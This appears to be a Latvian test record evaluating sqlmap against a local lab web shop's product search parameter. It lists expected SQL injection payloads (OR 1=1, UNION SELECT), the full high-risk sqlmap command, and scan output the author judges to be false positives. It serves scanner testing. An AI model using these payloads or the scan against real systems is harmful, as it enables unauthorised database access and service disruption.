=================================================================================
1. Īpašība: pseidorealistiska internetveikala mekletajs
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: q=test')) OR 1=1-- -
3.2. error-based: q=test'
3.3. time-based: -
3.4. union: q=test')) UNION SELECT 1,2,3,4,5,6,7,8,9-- -
4. Reālais rezultāts: redzams zemāk (neatkāts false positive)
5. Vidējais risinājuma ilgums: 2703109 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost:3000/rest/products/search?q=test" -p q --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 283 HTTP(s) requests:
---
Parameter: q (GET)
    Type: boolean-based blind (FALSE POSITIVE)
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=test%' AND 1597=1597 AND 'HNIe%'='HNIe

    Type: time-based blind (FALSE POSITIVE)
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: q=test%' AND 3196=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'Jcgw%'='Jcgw
---
back-end DBMS: SQLite
